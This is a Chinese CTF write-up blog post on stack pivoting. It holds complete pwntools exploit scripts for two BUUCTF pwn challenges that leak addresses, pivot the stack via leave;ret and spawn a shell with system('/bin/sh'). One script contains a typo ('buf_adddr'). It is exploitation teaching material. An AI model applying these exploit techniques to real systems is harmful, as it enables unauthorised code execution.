两题看栈迁移

最新推荐文章于 2024-04-23 15:47:53 发布
最新推荐文章于 2024-04-23 15:47:53 发布
阅读量653 收藏 5
点赞数 2
分类专栏: pwn ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45691294/article/details/112196127
版权
ctf 同时被 2 个专栏收录
25 篇文章 0 订阅
订阅专栏
pwn
12 篇文章 1 订阅
订阅专栏

文章目录

栈迁移

栈迁移的题目一般有一个特点,就是可以产生栈溢出,但是溢出的长度太短导致无法写完整的payload,而实质就是只能控制ebp的情况下去控制住eip从而控制程序的执行流
以 32 位程序举例,在使用 call 这个命令,进入一个函数的时候,程序会进行一系列栈操作:

push eip+4; push ebp; mov ebp,esp;

来保护现场,避免执行完函数后堆栈不平衡以及找不到之前的入口地址。

执行完函数后会进行一系列操作来还原现场 leave;ret;
这边的 leave 就相当于进入函数栈操作的逆过程。

leave  == mov esp,ebp;pop ebp;
ret    == pop eip #弹出栈顶数据给eip寄存器

我们可以发现 esp 决定的是栈顶在哪,如果说我们控制了传入的 ebp 就相当于控制了 esp,pop 出来的 ebp 也就可以是我们指定的,同样 eip 也是。从而就可以达到控制 eip 的目的。
但是想要控制 ebp 需要进行两次 leave 和一次 ret 也就是

mov esp,ebp;    //第一个ebp不受我们的控制,但是下面pop的ebp可以被我们更改,从而就可以控制第二个leave里面的esp
pop ebp;
mov esp,ebp;
pop ebp;
pop eip

[Black Watch 入群题]PWN

这是一道将栈迁移到bss段的题目
32位的程序,只开启了堆栈不可执行保护
在这里插入图片描述
用IDA分析一下程序,main函数直接进入到vul_function函数
write函数是用来输出程序字符串的,两个read函数接收用户输入,第一个read向s缓冲区接收0x200字节大小的内容,第二个read在buf缓冲区接收0x20字节大小的内容
在这里插入图片描述
第二个read只向栈上写入0x20个字节,但是buf缓冲区距离ebp只有0x18字节大小,也就是说存在栈溢出,但是只能控制8个字节,溢出的长度太短,并不能构造完整的payload达到getshell的目的
那来看一下第一个read函数,第一个read函数虽然可以向内存写入0x200个字节大小的内容,但是写入的位置并不在栈中,而是在可写的bss段中
通过栈迁移的方式就可以达到利用的目的,大体的思路就是,将leave、return的gadget放入到ebp后的返回地址的位置上,ebp放入栈段迁移的位置的地址,那么程序流就会执行到迁移的位置上,那么就可以执行完整的payload了
注意的是,因为我们使用了两次 levae 所以第二次 leave 里面的 pop ebp 属于多余的会让 esp-4,所以对应的我们的 s 的地址也需要减 4
exp:

from pwn import *
from LibcSearcher import *

r=remote('node3.buuoj.cn',28463)
#r=process('./spwn')
elf=ELF('./spwn')
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.symbols['main']
bss_addr=0x0804A300
leave_ret=0x08048511

payload=p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
r.recvuntil("What is your name?")
r.send(payload)

payload1='a'*0x18+p32(bss_addr-4)+p32(leave_ret)
r.recvuntil("What do you want to say?")
r.send(payload1)

write_addr=u32(r.recv(4))
print('[+]write_addr: ',hex(write_addr))
libc=LibcSearcher('write',write_addr)
libc_base=write_addr-libc.dump('write')
system_addr=libc_base+libc.dump('system')
bin_addr=libc_base+libc.dump('str_bin_sh')

r.recvuntil("What is your name?")
payload=p32(system_addr)+p32(main_addr)+p32(bin_addr)
r.send(payload)

r.recvuntil("What do you want to say?")
r.send(payload1)

r.interactive()

ciscn_2019_es_2

先查看一下程序的保护,32位的程序,开启了堆栈不可执行保护
在这里插入图片描述用IDA分析程序,主要利用点在vul函数,第一个read函数读取s缓冲区里0x30字节的内容,然后printf对s缓冲区的内容进行格式化输出,第二个read函数又在s缓冲区中读取了0x30字节的内容,然后又格式化输出一次
在这里插入图片描述
分析一下,这里的确存在栈溢出,但是只能溢出8个字节(0x30-0x28),无法让我们构造完整的rop chain来get shell,那么这里我们又需要想到利用栈迁移
但是这题与上题不同,上题是将栈迁移到可读写的bss区,但是这题却无法向bss区写入,那这里只能利用到栈段上面的空间,思路就是在栈上前面0x28个字节放入rop链,后面0x8个字节就用来实现栈迁移,栈结构可以参考下图
在这里插入图片描述
那么首先就要知道一个问题,缓冲区的地址是什么,所以首先需要leak缓冲区地址
这里第一个read和printf就派上用场了,因为read结束之后不会在末尾加上’\x00’,而printf不遇到’\x00’就不会停止打印,所以可以利用这个特点来leak栈上的地址,由于泄露了ebp,而这个地址和buf区域的相对偏移是固定的,所以程序每次运行我们都可以知道栈上的地址
通过调试来获得这个相对偏移
在这里插入图片描述
ebp上泄露的地址减去buf指向的地址,得到相对偏移为0x38,因此通过下面这个脚本可以获取到ebp和buf的地址

p.recvuntil("Welcome, my friend. What's your name?")
payload='a'*0x20+'b'*8
p.send(payload)
p.recvuntil("bbbbbbbb")
ebp=u32(p.recv(4))
print ('ebp--->'+hex(ebp))
buf_addr = ebp-0x38
print ('buf--->'+hex(buf_addr))

那接下来的问题就是构造rop链和栈迁移,栈迁移只需要找到程序中leave;retn的gadgets
我们这里直接把b’/bin/sh\x00’放在buf上,通过泄露出来的地址加偏移肯定能够找出放b’/bin/sh\x00’的起始地址,这样就省去了一个read往栈上写b’/bin/sh\x00’的过程,很巧妙的方法。至于这个起始地址怎么找,借鉴一下大佬这张图,一看就懂了
在这里插入图片描述下面连个exp差不多

from pwn import *

io = process("./ciscn_2019_es_2")
elf = ELF('./ciscn_2019_es_2')
sys_plt = elf.plt['system']
lea_ret = 0x80485FD

io.recvuntil("Welcome, my friend. What's your name?")
payload = b'A' * 0x24 + b'BBBB'
io.send(payload)
io.recvuntil("BBBB")
ebp = u32(io.recv(4))

payload2 = b'laji' + p32(sys_plt) + b'AAAA'+p32(ebp -0x28) + b'/bin/sh\x00' + b'A'*16 + p32(ebp - 0x38) + p32(lea_ret)

io.send(payload2)
io.interactive()

#coding=utf-8
#!/usr/bin/python
from pwn import *

p=remote("node3.buuoj.cn",27499)
#p=process("ciscn_2019_es_2")
context(arch='i386',os='linux',log_level='debug')

sys=0x8048400
leave_ret=0x08048562
gdb.attach(p,'b *0x80485FC')

p.recvuntil("Welcome, my friend. What's your name?")
payload='a'*0x20+'b'*8
p.send(payload)
p.recvuntil("bbbbbbbb")
ebp=u32(p.recv(4))
print ('ebp--->'+hex(ebp))
buf_addr = ebp-0x38
print ('buf--->'+hex(buf_addr))

payload1 =p32(sys) +p32(0) +p32(buf_adddr+0x4*3)+"/bin/sh" #buf_adddr+0x4*3指向了参数的位置
payload1 =payload1.ljust(0x28,'\x00')
payload1 += p32(buf_addr-4) +p32(leave_ret)
p.send(payload1)
p.interactive()

下图是脚本执行后栈的情况
在这里插入图片描述

沫忆末忆
关注
专栏目录
2024年Unity 面试题 |五萬字 二佰道| Unity面试题大全,面试题总结【全网最全,收藏一篇足够面试】
努力前行,总会成为自己心中的那道光
02-23 12万+
正所谓 金三银四 ,又到了找工作的大好时机了,不知道大家有没有意向找一份更好的工作呢~ 之前写了很多Unity的学习和实例文章,但是面试题部分还没有一个系统的整理。 那本篇文章就来整理一下Unity中一些常见的面试题,说不准就会面试的时候就会遇到! 本篇文章会将Unity所有方面的面试资料都融会贯通,绝对是2022年Unity面试领域最实用的文章啦!
【pwn】 关于迁移
wintersun的地带
05-19 3207
[pwn] 关于迁移在我们仅仅只能够控制ebp的情况下,我们怎么才能够控制eip去拿到我们的shell呢。以下为科普以32位程序举例,在使用call这个命令,进入一个函数的时候,程序会进行一系列操作: push eip+4;push ebp;mov ebp,esp;来保护现场,避免执行完函数后堆不平衡以及找不到之前的入口地址。执行完函数后会进行一系列操作来还原现场leave;ret; 这
迁移/劫持
chennbnbnb的博客
01-30 1029
例子 https://github.com/scwuaptx/HITCON-Training/tree/master/LAB/lab6 #include <stdio.h> #include <stdlib.h> #include <unistd.h> int count = 1337 ; int main(){ if(count != 13...
PWN题型之迁移
swedsn
07-30 1826
文章目录前言0x1 :基本知识:0x2 :利用思路 :0x3 :实例讲解 前言 0x1 :基本知识: (1)存在溢出,但是溢出的长度不够,你输入的内容最多只能覆盖掉ret返回地址,而之后的rop链无法构造。 (2)就是之前的.bas 0x2 :利用思路 : 0x3 :实例讲解 ...
从一道简单的pwn题 认识 转移
qq_41071646的博客
04-27 521
这个题 好像是 bugku的 但是好像这个题 给换了 这个是 64位的程序 这个题 难搞点就是 空间不够 可以看的出来 我们s的地方是 rbp-0x10的地方 那么 返回地址 应该就是 rbp-0x18的地址 如果我们想把这个搞定 那么 要考虑一下 转移 转移 有很多高级的用法 这里 就浅显的说一些简单的 转移 转移 其实就是利用的是这两个...
ciscn_2019_es_2 迁移(很好的例子)
weixin_46521144的博客
07-17 1235
ciscn_2019_es_2 一道很好的迁移例题。之前看合天讲的虽然也涉及到原理,但是例子用的是攻防世界pwn200,溢出长度还是有点多。这次只能溢出ebp和retaddr,就很典型并且有挑战性。这题没做出来,看的wp,希望下次能自己做出来。 题目给了两次溢出,这两次都是必要的。一般来说,第一次溢出需要泄露上地址用来给第二次做迁移使用,第二次执行迁移,控制ret跳转到我们所迁移上,执行上填写的exp。由于第二次依然是在函数帧内输入,因此除非能自己read到bss上(通常能这样做的溢出空间也
pwn刷题num43---迁移
tbsqigongzi的博客
05-03 703
BUUCTF-PWN-ciscn_2019_es_2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在溢出 开启NX保护-----堆不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下伪代码 可以看到read函数读入0x30字节给s,可是s是0x28字节大小,只相差0x8字节,只能覆盖ebp和函数返回地址,而程序中无直接getshell的函数,程序
PWN 迁移入门解说 [Black Watch 入群题]PWN
weixin_45441024的博客
11-30 683
PWN之迁移解说 适用情况: 1.溢出的长度不足以让我们把ROP写进去 2.程序开启了的不可执行保护 基础知识: 我们迁移的目的就是将我们在上不可执行的链子转移到data段或者bss段上面 ,这里就需要用到leave;ret了,在这一类的题型中我们是构造并使用两次leave,来将ebp转移到我们构造的后门的起始位置。 寻找leave;ret需要用到ROPgadget这个工具 $ ROPgadget --binary '/home/pwn/Desktop/bbys_tu_2016' --only
鲲鹏练习题六套.docx
04-30
HCIA-Kunpeng Application Developer认证定位于培养能够使用鲲鹏计算平台,完成应用从X86向鲲鹏平台的迁移以及基于鲲鹏平台进行应用开发部署的专业人才。本套资源(鲲鹏培训六套练习题,助你通过鲲鹏鲲鹏HCIA认证,与...
java堆和面试题,面试阿里巴巴
最新发布
2301_82243396的博客
04-23 788
笔者已经把面试题和答案整理成了面试专题文档《互联网大厂面试真题解析、进阶开发核心学习笔记、全套讲解视频、实战项目源码讲义》点击传送门即可获取!获取!
迁移练习
Civit_的博客
03-27 209
迁移基础——>
迁移学习(buuctf [Black Watch 入群题])
像初雪一样自由洒落
03-14 1024
i春秋的borrowstack是迁移和万能gadget的混合,,,然后writeup看的不是很明白,也没有很细的解析,所以,emmm,应该是自己迁移学的不是很好,只是知道大概的意思,但是还没有做过题,这次在看雪看到文章,就好好学一下,做到题啦!! 迁移,我觉得比较好理解,如果试过将调用一个函数过程好好自己试过的话,知道控制ebp,可以控制函数的去向,详细可以看看这篇图示:https://b...
迁移小总结
weixin_61283545的博客
04-24 445
[BUUCTF]PWN14——not_the_same_3dsctf_2016_mcmuyanga的博客-CSDN博客
迁移
huzai9527的博客
02-22 566
迁移 1.为什么需要转移? 在空间不够存放payload的情况下,需要一个新的地址空间存放payload 开启PIE保护,地址未知,我们可以将劫持到已知的区域 2.概念 劫持的rsp(ESP),使其指向其他位置,形成一个伪造的,在此中做ROP 3.必要的gadget pop ebp;ret 释放EBP,并连接伪造的 leave;ret 更改ESP,指向后续的payload 4.原理 通过 pop ebp;ret + 伪造的让程序直接跳转到伪造的里面,然后为了保持平衡
BUUCTF迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1048
1.checksec+运行获取基本信息 32位+NX堆不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
buuctf ciscn_2019_es_2 迁移(二)
weixin_45441024的博客
12-10 315
buuctf ciscn_2019_es_2 迁移(二) 相关的方法和步骤在后面注明 from pwn import * proc_name = '/home/pwn/Desktop/ciscn_2019_es_2' p = remote('node3.buuoj.cn', 27732) elf = ELF(proc_name) system_plt = elf.plt['system'] main_addr = elf.sym['main'] leave_ret = 0x80484b8 log.in
UNCTF 原神 迁移
qq_36995313的博客
05-03 575
转移原生 先回忆一下学长上次的解题要点讲解: 数据在内存中,是没有指定格式的 一些整型数据,刚好可以对应字符串 利用已映射的字符串,作为system的参数 如果找不出到题目真正的考点,或者写不出自动抽卡脚本,就只有用转移的暴力方法来做了 程序分析 拿到程序,首先checksec检查一下 No PIE,NO canary,意味着可以少写一点exp IDA ,F5直接定位到可导致溢出的函数:read() 因为只有NX保护,所以按理说是比较好getshell的,但是此处的read函数,只接受0x
迁移总结
2302_79899078的博客
03-13 1451
迁移,orw
从BUUCTF之ciscn_2019_es_2简单复习迁移,即stack pivoting
Probeginner的博客
11-27 1325
简单迁移迁移简单
法实现先进先出队列
在本题中,我们需要实现一个名为 `MyQueue` 的类,该类使用两个来模拟一个队列,遵循先入后出(FIFO)的原则。队列支持以下操作: 1. **push(int x)**: 将元素 `x` 添加到队列的末尾,即将元素压入后一个(称为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值